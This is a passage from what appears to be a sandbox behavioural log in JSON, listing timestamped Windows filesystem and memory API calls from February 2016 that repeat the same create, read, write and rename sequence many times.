"NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,852", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,852", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,852", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,852", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,852", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,852", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,862", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,862", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,862", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,862", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,862", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,862", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,862", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,862", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,862", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,872", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,872", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,872", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,872", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,872", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,872", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,872", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,872", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,872", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,872", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,872", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,882", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,882", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,882", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,882", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,882", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,882", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,882", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,882", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,892", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,892", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,892", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,892", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,892", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,892", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,892", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,892", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,902", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,902", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,902", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,902", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,902", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,902", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,902", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,902", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,912", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,912", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,912", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,912", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,912", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,912", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,912", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,912", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,912", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,912", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,912", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,922", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,922", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,922", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,922", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,922", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,922", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,922", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,922", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,922", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,922", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,933", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,933", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,933", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,933", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,933", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,933", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,933", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,933", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,933", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,933", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,943", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,943", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,943", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,943", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,943", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,943", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,943", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,943", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,943", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,953", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,953", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,953", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,953", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,953", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,953", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,953", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,953", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,953", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,953", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,953", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,963", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,963", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,963", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,963", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,963", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,963", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,963", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,963", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,963", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,963", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,973", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,973", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,973", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,973", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,973", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,973", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,973", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,973", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,973", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,973", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,983", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,983", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,983", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,983", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,983", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,983", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,983", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,983", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,983", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,993", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,993", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,993", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,993", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,993", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:48,993", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,993", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:48,993", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,003", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,003", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,003", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,003", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,003", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,003", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,003", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,003", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,003", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,003", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,003", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,003", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,003", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,003", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,003", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,013", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,013", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,013", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,013", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,013", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,013", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,013", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,013", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,013", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,013", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,013", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,013", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,023", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,023", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,023", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,023", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,023", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,023", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,023", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,023", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,023", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,023", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,033", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,033", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,033", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,033", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,033", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,033", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,033", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,033", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,033", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,033", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,033", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,043", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,043", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,043", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,043", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,043", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,043", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,043", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,043", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,043", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,043", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,043", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,053", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,053", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,053", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,053", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,053", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,053", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,053", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,053", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,053", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,053", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,063", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,063", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,063", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,063", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,063", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,063", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,063", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,063", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,063", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,063", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,063", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,073", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,073", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,073", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,073", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,073", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,073", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,073", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,073", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,073", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,083", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,083", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,083", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,083", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,083", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,083", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,083", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,083", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,083", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,083", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,083", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,093", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,093", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,093", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,093", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,093", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,093", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,093", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,093", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,103", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,103", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,103", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,103", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,103", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,103", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,103", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,103", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,103", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,113", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,113", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,113", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,113", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,113", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,113", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,113", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,113", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,113", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,113", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,123", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,123", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,123", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,123", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,123", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,123", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,123", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,123", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,123", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,133", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,133", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,133", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,133", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,133", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,133", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,133", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,133", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,133", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,143", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,143", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,143", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,143", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,143", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,143", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,143", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,143", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,143", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,143", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,143", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,153", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,153", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,153", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,153", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,153", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,153", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,153", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,153", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,153", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,153", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,153", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,163", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,163", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,163", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,163", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,163", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,163", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,163", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,163", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,163", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,163", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,163", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,163", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,173", "api": 